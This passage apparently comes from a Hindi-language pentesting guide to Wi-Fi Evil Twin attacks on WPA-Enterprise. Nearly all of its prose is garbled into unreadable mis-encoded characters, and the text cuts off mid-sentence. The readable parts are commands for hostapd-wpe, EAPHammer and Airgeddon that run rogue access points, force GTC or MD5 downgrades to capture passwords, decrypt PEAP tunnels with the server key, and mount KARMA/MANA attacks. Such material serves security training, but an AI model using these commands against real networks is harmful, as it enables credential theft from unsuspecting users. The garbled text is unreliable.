рдЗрд╕ рд╣рдорд▓реЗ рдХреЛ рд╕рдордЭрдиреЗ рдХреЗ рд▓рд┐рдП рдореИрдВ рдкрд╣рд▓реЗ рд╕рдВрдХреНрд╖рд┐рдкреНрдд WPA Enterprise explanation рдкрдврд╝рдиреЗ рдХреА рд╕рд┐рдлрд╛рд░рд┐рд╢ рдХрд░реВрдВрдЧрд╛ред

Using hostapd-wpe

hostapd-wpe рдХреЛ рдХрд╛рдо рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ configuration рдлрд╝рд╛рдЗрд▓ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрддреА рд╣реИред рдЗрди рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреЗ рдирд┐рд░реНрдорд╛рдг рдХреЛ automate рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЖрдк https://github.com/WJDigby/apd_launchpad рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ (//etc/hostapd-wpe/ рдХреЗ рдЕрдВрджрд░ python рдлрд╝рд╛рдЗрд▓ рдбрд╛рдЙрдирд▓реЛрдб рдХрд░реЗрдВ)

./apd_launchpad.py -t victim -s PrivateSSID -i wlan0 -cn company.com
hostapd-wpe ./victim/victim.conf -s

рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдлрд╝рд╛рдЗрд▓ рдореЗрдВ рдЖрдк рдХрдИ рд╡рд┐рднрд┐рдиреНрди рдЪреАрдЬрд╝реЗрдВ рдЪреБрди рд╕рдХрддреЗ рд╣реИрдВ рдЬреИрд╕реЗ ssid, рдЪреИрдирд▓, рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдлрд╝рд╛рдЗрд▓реЗрдВ, рдХреНрд░реЗрдЯ/рдХреА, dh рдкреИрд░рд╛рдореАрдЯрд░, wpa рд╕рдВрд╕реНрдХрд░рдг рдФрд░ рдкреНрд░рдорд╛рдгреАрдХрд░рдг...

EAP-TLS рдХреЗ рд╕рд╛рде hostapd-wpe рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХрд┐рд╕реА рднреА рдкреНрд░рдорд╛рдгрдкрддреНрд░ рдХреЛ рд▓реЙрдЧрд┐рди рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдирд╛ред

EAPHammer рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдирд╛

# Generate Certificates
./eaphammer --cert-wizard

# Launch Attack
./eaphammer -i wlan0 --channel 4 --auth wpa-eap --essid CorpWifi --creds

рдбрд┐рдлрд╝реЙрд▓реНрдЯ рд░реВрдк рд╕реЗ, EAPHammer рдЗрди рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдЙрджреНрджреЗрд╢реНрдп рд░рдЦрддрд╛ рд╣реИ (рдзреНрдпрд╛рди рджреЗрдВ рдХрд┐ GTC рдкрд╣рд▓реЗ рдкреНрд░рдпрд╛рд╕ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реНрдкрд╖реНрдЯ рдкрд╛рд╕рд╡рд░реНрдб рдкреНрд░рд╛рдкреНрдд рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд╣реИ рдФрд░ рдлрд┐рд░ рдЕрдзрд┐рдХ рдордЬрдмреВрдд рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ):

GTC,MSCHAPV2,TTLS-MSCHAPV2,TTLS,TTLS-CHAP,TTLS-PAP,TTLS-MSCHAP,MD5

рдпрд╣ рд▓рдВрдмреЗ рдХрдиреЗрдХреНрд╢рди рд╕рдордп рд╕реЗ рдмрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдбрд┐рдлрд╝реЙрд▓реНрдЯ рдкрджреНрдзрддрд┐ рд╣реИред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдЖрдк рд╕рд░реНрд╡рд░ рдХреЛ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЛ рд╕рдмрд╕реЗ рдХрдордЬреЛрд░ рд╕реЗ рд╕рдмрд╕реЗ рдордЬрдмреВрдд рддрдХ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рднреА рдХрд╣ рд╕рдХрддреЗ рд╣реИрдВ:

--negotiate weakest

Or you could also use:

  • --negotiate gtc-downgrade рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЕрддреНрдпрдзрд┐рдХ рдХреБрд╢рд▓ GTC рдбрд╛рдЙрдирдЧреНрд░реЗрдб рдХрд╛рд░реНрдпрд╛рдиреНрд╡рдпрди (plaintext passwords) рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░реЗрдВ

  • --negotiate manual --phase-1-methods PEAP,TTLS --phase-2-methods MSCHAPV2,GTC,TTLS-PAP рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдореИрдиреНрдпреБрдЕрд▓ рд░реВрдк рд╕реЗ рдкреНрд░рд╕реНрддрд╛рд╡рд┐рдд рд╡рд┐рдзрд┐рдпреЛрдВ рдХреЛ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдХрд░реЗрдВ (рд╣рдорд▓реЗ рдХреЗ рд▓рд┐рдП рд╕рдВрдЧрдарди рдХреЗ рд╕рдорд╛рди рдХреНрд░рдо рдореЗрдВ рд╡рд╣реА рдкреНрд░рдорд╛рдгреАрдХрд░рдг рд╡рд┐рдзрд┐рдпрд╛рдБ рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рд╕реЗ рд╣рдорд▓реЗ рдХрд╛ рдкрддрд╛ рд▓рдЧрд╛рдирд╛ рдмрд╣реБрдд рдЕрдзрд┐рдХ рдХрдард┐рди рд╣реЛ рдЬрд╛рдПрдЧрд╛)ред

Using Airgeddon

Airgeddon рдкрд╣рд▓реЗ рд╕реЗ рдЙрддреНрдкрдиреНрди рдкреНрд░рдорд╛рдгрдкрддреНрд░реЛрдВ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ WPA/WPA2-Enterprise рдиреЗрдЯрд╡рд░реНрдХ рдХреЗ рд▓рд┐рдП EAP рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдкреНрд░рджрд╛рди рдХрд░ рд╕рдХрддрд╛ рд╣реИред рдирдХрд▓реА рдиреЗрдЯрд╡рд░реНрдХ рдХрдиреЗрдХреНрд╢рди рдкреНрд░реЛрдЯреЛрдХреЙрд▓ рдХреЛ EAP-MD5 рдореЗрдВ рдбрд╛рдЙрдирдЧреНрд░реЗрдб рдХрд░реЗрдЧрд╛ рддрд╛рдХрд┐ рдпрд╣ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдФрд░ рдкрд╛рд╕рд╡рд░реНрдб рдХрд╛ MD5 рдХреИрдкреНрдЪрд░ рдХрд░ рд╕рдХреЗред рдмрд╛рдж рдореЗрдВ, рд╣рдорд▓рд╛рд╡рд░ рдкрд╛рд╕рд╡рд░реНрдб рдХреЛ рдХреНрд░реИрдХ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд╕рдХрддрд╛ рд╣реИред Airgeddon рдЖрдкрдХреЛ рдирд┐рд░рдВрддрд░ Evil Twin рд╣рдорд▓реЗ (noisy) рдпрд╛ рдХреЗрд╡рд▓ рддрдм рддрдХ Evil Attack рдмрдирд╛рдиреЗ рдХреА рд╕рдВрднрд╛рд╡рдирд╛ рдкреНрд░рджрд╛рди рдХрд░рддрд╛ рд╣реИ рдЬрдм рддрдХ рдХреЛрдИ рдХрдиреЗрдХреНрдЯ рди рд╣реЛ (smooth)ред

Debugging PEAP and EAP-TTLS TLS tunnels in Evil Twins attacks

рдпрд╣ рд╡рд┐рдзрд┐ PEAP рдХрдиреЗрдХреНрд╢рди рдореЗрдВ рдкрд░реАрдХреНрд╖рдг рдХреА рдЧрдИ рдереА рд▓реЗрдХрд┐рди рдЪреВрдВрдХрд┐ рдореИрдВ рдПрдХ рдордирдорд╛рдиреЗ TLS рдЯрдирд▓ рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░ рд░рд╣рд╛ рд╣реВрдБ, рдпрд╣ EAP-TTLS рдХреЗ рд╕рд╛рде рднреА рдХрд╛рдо рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП

hostapd-wpe рдХреА configuration рдХреЗ рдЕрдВрджрд░ dh_file рд╡рд╛рд▓реА рдкрдВрдХреНрддрд┐ рдХреЛ comment рдХрд░реЗрдВ (from dh_file=/etc/hostapd-wpe/certs/dh to #dh_file=/etc/hostapd-wpe/certs/dh) рдпрд╣ hostapd-wpe рдХреЛ RSA рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдХреБрдВрдЬреА рдХрд╛ рдЖрджрд╛рди-рдкреНрд░рджрд╛рди рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдордЬрдмреВрд░ рдХрд░реЗрдЧрд╛, рддрд╛рдХрд┐ рдЖрдк рдмрд╛рдж рдореЗрдВ рдЯреНрд░реИрдлрд╝рд┐рдХ рдХреЛ рдбрд┐рдХреНрд░рд┐рдкреНрдЯ рдХрд░ рд╕рдХреЗрдВ рд╕рд░реНрд╡рд░ рдХреА рдирд┐рдЬреА рдХреБрдВрдЬреА рдХреЛ рдЬрд╛рдирддреЗ рд╣реБрдПред

рдЕрдм Evil Twin рдХреЛ hostapd-wpe рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдЙрд╕ рд╕рдВрд╢реЛрдзрд┐рдд рдХреЙрдиреНрдлрд╝рд┐рдЧрд░реЗрд╢рди рдХреЗ рд╕рд╛рде рд╕рд╛рдорд╛рдиреНрдп рд░реВрдк рд╕реЗ рд╢реБрд░реВ рдХрд░реЗрдВред рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, Evil Twin рд╣рдорд▓реЗ рдХреЛ рдХрд░рдиреЗ рд╡рд╛рд▓реЗ interface рдореЗрдВ wireshark рд╢реБрд░реВ рдХрд░реЗрдВред

рдЕрдм рдпрд╛ рдмрд╛рдж рдореЗрдВ (рдЬрдм рдЖрдкрдиреЗ рдкрд╣рд▓реЗ рд╕реЗ рдХреБрдЫ рдкреНрд░рдорд╛рдгреАрдХрд░рдг рдЗрд░рд╛рджреЗ рдХреИрдкреНрдЪрд░ рдХрд░ рд▓рд┐рдП рд╣реИрдВ) рдЖрдк wireshark рдореЗрдВ рдирд┐рдЬреА RSA рдХреБрдВрдЬреА рдЬреЛрдбрд╝ рд╕рдХрддреЗ рд╣реИрдВ: Edit --> Preferences --> Protocols --> TLS --> (RSA keys list) Edit...

рдПрдХ рдирдпрд╛ рдкреНрд░рд╡рд┐рд╖реНрдЯрд┐ рдЬреЛрдбрд╝реЗрдВ рдФрд░ рдЗрд╕ рдорд╛рдиреЛрдВ рдХреЗ рд╕рд╛рде рдлреЙрд░реНрдо рднрд░реЗрдВ: IP address = any -- Port = 0 -- Protocol = data -- Key File (рдЕрдкрдиреА рдХреБрдВрдЬреА рдлрд╝рд╛рдЗрд▓ рдХрд╛ рдЪрдпрди рдХрд░реЗрдВ, рд╕рдорд╕реНрдпрд╛рдУрдВ рд╕реЗ рдмрдЪрдиреЗ рдХреЗ рд▓рд┐рдП рдПрдХ рдХреБрдВрдЬреА рдлрд╝рд╛рдЗрд▓ рдмрд┐рдирд╛ рдкрд╛рд╕рд╡рд░реНрдб рд╕реБрд░рдХреНрд╖рд┐рдд рдХреЗ рдЪреБрдиреЗрдВ)ред

рдФрд░ рдирдП "Decrypted TLS" рдЯреИрдм рдкрд░ рдирдЬрд╝рд░ рдбрд╛рд▓реЗрдВ:

KARMA, MANA, Loud MANA and Known beacons attack

ESSID and MAC black/whitelists

Media Access Control Filter Lists (MFACLs) рдХреЗ рд╡рд┐рднрд┐рдиреНрди рдкреНрд░рдХрд╛рд░ рдФрд░ рдЙрдирдХреЗ рд╕рдВрдмрдВрдзрд┐рдд рдореЛрдб рдФрд░ рдПрдХ рдзреЛрдЦрд╛рдзрдбрд╝реА Access Point (AP) рдХреЗ рд╡реНрдпрд╡рд╣рд╛рд░ рдкрд░ рдкреНрд░рднрд╛рд╡:

  1. MAC-рдЖрдзрд╛рд░рд┐рдд Whitelist:

  • рдзреЛрдЦрд╛рдзрдбрд╝реА AP рдХреЗрд╡рд▓ рд╡реНрд╣рд╛рдЗрдЯрд▓рд┐рд╕реНрдЯ рдореЗрдВ рдирд┐рд░реНрджрд┐рд╖реНрдЯ рдЙрдкрдХрд░рдгреЛрдВ рд╕реЗ рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЙрддреНрддрд░ рджреЗрдЧрд╛, рдЕрдиреНрдп рд╕рднреА рдХреЗ рд▓рд┐рдП рдЕрджреГрд╢реНрдп рд░рд╣реЗрдЧрд╛ред

  1. MAC-рдЖрдзрд╛рд░рд┐рдд Blacklist:

  • рдзреЛрдЦрд╛рдзрдбрд╝реА AP рдмреНрд▓реИрдХрд▓рд┐рд╕реНрдЯ рдореЗрдВ рдЙрдкрдХрд░рдгреЛрдВ рд╕реЗ рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХреА рдЕрдирджреЗрдЦреА рдХрд░реЗрдЧрд╛, рдкреНрд░рднрд╛рд╡реА рд░реВрдк рд╕реЗ рдзреЛрдЦрд╛рдзрдбрд╝реА AP рдХреЛ рдЙрди рд╡рд┐рд╢рд┐рд╖реНрдЯ рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдП рдЕрджреГрд╢реНрдп рдмрдирд╛ рджреЗрдЧрд╛ред

  1. SSID-рдЖрдзрд╛рд░рд┐рдд Whitelist:

  • рдзреЛрдЦрд╛рдзрдбрд╝реА AP рдХреЗрд╡рд▓ рд╡рд┐рд╢рд┐рд╖реНрдЯ ESSIDs рдХреЗ рд▓рд┐рдП рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЙрддреНрддрд░ рджреЗрдЧрд╛, рдЬрд┐рд╕рд╕реЗ рдпрд╣ рдЙрди рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдП рдЕрджреГрд╢реНрдп рд╣реЛ рдЬрд╛рдПрдЧрд╛ рдЬрд┐рдирдХреА рдкрд╕рдВрджреАрджрд╛ рдиреЗрдЯрд╡рд░реНрдХ рд╕реВрдЪрд┐рдпреЛрдВ (PNLs) рдореЗрдВ рд╡реЗ ESSIDs рд╢рд╛рдорд┐рд▓ рдирд╣реАрдВ рд╣реИрдВред

  1. SSID-рдЖрдзрд╛рд░рд┐рдд Blacklist:

  • рдзреЛрдЦрд╛рдзрдбрд╝реА AP рдмреНрд▓реИрдХрд▓рд┐рд╕реНрдЯ рдореЗрдВ рд╡рд┐рд╢рд┐рд╖реНрдЯ ESSIDs рдХреЗ рд▓рд┐рдП рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЙрддреНрддрд░ рдирд╣реАрдВ рджреЗрдЧрд╛, рдЬрд┐рд╕рд╕реЗ рдпрд╣ рдЙрди рдЙрдкрдХрд░рдгреЛрдВ рдХреЗ рд▓рд┐рдП рдЕрджреГрд╢реНрдп рд╣реЛ рдЬрд╛рдПрдЧрд╛ рдЬреЛ рдЙрди рд╡рд┐рд╢реЗрд╖ рдиреЗрдЯрд╡рд░реНрдХ рдХреА рддрд▓рд╛рд╢ рдХрд░ рд░рд╣реЗ рд╣реИрдВред

# example EAPHammer MFACL file, wildcards can be used
09:6a:06:c8:36:af
37:ab:46:7a:9a:7c
c7:36:8c:b2:*:*

[--mac-whitelist /path/to/mac/whitelist/file.txt #EAPHammer whitelisting]
[--mac-blacklist /path/to/mac/blacklist/file.txt #EAPHammer blacklisting]
# example ESSID-based MFACL file
name1
name2
name3

[--ssid-whitelist /path/to/mac/whitelist/file.txt]
[--ssid-blacklist /path/to/mac/blacklist/file.txt]

KARMA

рдпрд╣ рд╡рд┐рдзрд┐ рд╣рдорд▓рд╛рд╡рд░ рдХреЛ рдПрдХ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг рдПрдХреНрд╕реЗрд╕ рдкреЙрдЗрдВрдЯ (AP) рдмрдирд╛рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддреА рд╣реИ рдЬреЛ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░ рд░рд╣реЗ рдЙрдкрдХрд░рдгреЛрдВ рд╕реЗ рд╕рднреА рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЙрддреНрддрд░ рджреЗрддреА рд╣реИред рдпрд╣ рддрдХрдиреАрдХ рдЙрдкрдХрд░рдгреЛрдВ рдХреЛ рд╣рдорд▓рд╛рд╡рд░ рдХреЗ AP рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдзреЛрдЦрд╛ рджреЗрддреА рд╣реИ рдЬреЛ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рдЦреЛрдЬреЗ рдЬрд╛ рд░рд╣реЗ рдиреЗрдЯрд╡рд░реНрдХ рдХреА рдирдХрд▓ рдХрд░рддреА рд╣реИред рдПрдХ рдмрд╛рд░ рдЬрдм рдПрдХ рдЙрдкрдХрд░рдг рдЗрд╕ рдзреЛрдЦреЗрдмрд╛рдЬрд╝ AP рдХреЛ рдХрдиреЗрдХреНрд╢рди рдЕрдиреБрд░реЛрдз рднреЗрдЬрддрд╛ рд╣реИ, рддреЛ рдпрд╣ рдХрдиреЗрдХреНрд╢рди рдкреВрд░рд╛ рдХрд░рддрд╛ рд╣реИ, рдЬрд┐рд╕рд╕реЗ рдЙрдкрдХрд░рдг рдЧрд▓рддреА рд╕реЗ рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдХрдиреЗрдХреНрдЯ рд╣реЛ рдЬрд╛рддрд╛ рд╣реИред

MANA

рдлрд┐рд░, рдЙрдкрдХрд░рдгреЛрдВ рдиреЗ рдЕрдирдЪрд╛рд╣реЗ рдиреЗрдЯрд╡рд░реНрдХ рдкреНрд░рддрд┐рдХреНрд░рд┐рдпрд╛рдУрдВ рдХреА рдЕрдирджреЗрдЦреА рдХрд░рдирд╛ рд╢реБрд░реВ рдХрд░ рджрд┐рдпрд╛, рдЬрд┐рд╕рд╕реЗ рдореВрд▓ рдХрд░реНрдорд╛ рд╣рдорд▓реЗ рдХреА рдкреНрд░рднрд╛рд╡рд╢реАрд▓рддрд╛ рдХрдо рд╣реЛ рдЧрдИред рд╣рд╛рд▓рд╛рдБрдХрд┐, рдПрдХ рдирдИ рд╡рд┐рдзрд┐, рдЬрд┐рд╕реЗ MANA рд╣рдорд▓реЗ рдХреЗ рд░реВрдк рдореЗрдВ рдЬрд╛рдирд╛ рдЬрд╛рддрд╛ рд╣реИ, рдХреЛ рдЗрдпрд╛рди рдбреА рд╡рд┐рд▓реНрд▓рд┐рдпрд░реНрд╕ рдФрд░ рдбреЛрдорд┐рдирд┐рдХ рд╡реНрд╣рд╛рдЗрдЯ рджреНрд╡рд╛рд░рд╛ рдкреЗрд╢ рдХрд┐рдпрд╛ рдЧрдпрд╛ред рдпрд╣ рд╡рд┐рдзрд┐ рдзреЛрдЦреЗрдмрд╛рдЬрд╝ AP рдЙрдкрдХрд░рдгреЛрдВ рд╕реЗ рдкреНрд░реЗрдлрд░реНрдб рдиреЗрдЯрд╡рд░реНрдХ рд╕реВрдЪрд┐рдпреЛрдВ (PNL) рдХреЛ рдХреИрдкреНрдЪрд░ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рдЙрдирдХреЗ рдкреНрд░рд╕рд╛рд░рдг рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХрд╛ рдЙрддреНрддрд░ рджреЗрдиреЗ рдореЗрдВ рд╢рд╛рдорд┐рд▓ рд╣реИ рдЬрд┐рд╕рдореЗрдВ рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рдкрд╣рд▓реЗ рд╕реЗ рдЕрдиреБрд░реЛрдзрд┐рдд рдиреЗрдЯрд╡рд░реНрдХ рдирд╛рдо (SSIDs) рд╣реЛрддреЗ рд╣реИрдВред рдпрд╣ рдЬрдЯрд┐рд▓ рд╣рдорд▓рд╛ рдореВрд▓ рдХрд░реНрдорд╛ рд╣рдорд▓реЗ рдХреЗ рдЦрд┐рд▓рд╛рдл рд╕реБрд░рдХреНрд╖рд╛ рдХреЛ рджрд░рдХрд┐рдирд╛рд░ рдХрд░рддрд╛ рд╣реИ, рдЙрдкрдХрд░рдгреЛрдВ рджреНрд╡рд╛рд░рд╛ рдЬреНрдЮрд╛рдд рдиреЗрдЯрд╡рд░реНрдХ рдХреЛ рдпрд╛рдж рд░рдЦрдиреЗ рдФрд░ рдкреНрд░рд╛рдердорд┐рдХрддрд╛ рджреЗрдиреЗ рдХреЗ рддрд░реАрдХреЗ рдХрд╛ рд▓рд╛рдн рдЙрдард╛рдХрд░ред

MANA рд╣рдорд▓рд╛ рдЙрдкрдХрд░рдгреЛрдВ рд╕реЗ рдирд┐рд░реНрджреЗрд╢рд┐рдд рдФрд░ рдкреНрд░рд╕рд╛рд░рдг рдкреНрд░реЙрдм рдЕрдиреБрд░реЛрдзреЛрдВ рдХреА рдирд┐рдЧрд░рд╛рдиреА рдХрд░рдХреЗ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИред рдирд┐рд░реНрджреЗрд╢рд┐рдд рдЕрдиреБрд░реЛрдзреЛрдВ рдХреЗ рд▓рд┐рдП, рдпрд╣ рдЙрдкрдХрд░рдг рдХреЗ MAC рдкрддреЗ рдФрд░ рдЕрдиреБрд░реЛрдзрд┐рдд рдиреЗрдЯрд╡рд░реНрдХ рдирд╛рдо рдХреЛ рд░рд┐рдХреЙрд░реНрдб рдХрд░рддрд╛ рд╣реИ, рдЗрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХреЛ рдПрдХ рд╕реВрдЪреА рдореЗрдВ рдЬреЛрдбрд╝рддрд╛ рд╣реИред рдЬрдм рдПрдХ рдкреНрд░рд╕рд╛рд░рдг рдЕрдиреБрд░реЛрдз рдкреНрд░рд╛рдкреНрдд рд╣реЛрддрд╛ рд╣реИ, рддреЛ AP рдЙрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХреЗ рд╕рд╛рде рдЙрддреНрддрд░ рджреЗрддрд╛ рд╣реИ рдЬреЛ рдЙрдкрдХрд░рдг рдХреА рд╕реВрдЪреА рдореЗрдВ рдХрд┐рд╕реА рднреА рдиреЗрдЯрд╡рд░реНрдХ рд╕реЗ рдореЗрд▓ рдЦрд╛рддреА рд╣реИ, рдЙрдкрдХрд░рдг рдХреЛ рдзреЛрдЦреЗрдмрд╛рдЬрд╝ AP рд╕реЗ рдХрдиреЗрдХреНрдЯ рдХрд░рдиреЗ рдХреЗ рд▓рд┐рдП рд▓реБрднрд╛рддреА рд╣реИред

./eaphammer -i wlan0 --cloaking full --mana --mac-whitelist whitelist.txt [--captive-portal] [--auth wpa-psk --creds]

Loud MANA

A Loud MANA attack рдПрдХ рдЙрдиреНрдирдд рд░рдгрдиреАрддрд┐ рд╣реИ рдЬрдм рдЙрдкрдХрд░рдг рдирд┐рд░реНрджреЗрд╢рд┐рдд рдкреНрд░реЙрдмрд┐рдВрдЧ рдХрд╛ рдЙрдкрдпреЛрдЧ рдирд╣реАрдВ рдХрд░рддреЗ рд╣реИрдВ рдпрд╛ рдЬрдм рдЙрдирдХреЗ рдкреНрд░реЗрдлрд░реНрдб рдиреЗрдЯрд╡рд░реНрдХ рд▓рд┐рд╕реНрдЯ (PNL) рд╣рдорд▓рд╛рд╡рд░ рдХреЗ рд▓рд┐рдП рдЕрдЬреНрдЮрд╛рдд рд╣реЛрддреЗ рд╣реИрдВред рдпрд╣ рдЗрд╕ рд╕рд┐рджреНрдзрд╛рдВрдд рдкрд░ рдХрд╛рдо рдХрд░рддрд╛ рд╣реИ рдХрд┐ рдПрдХ р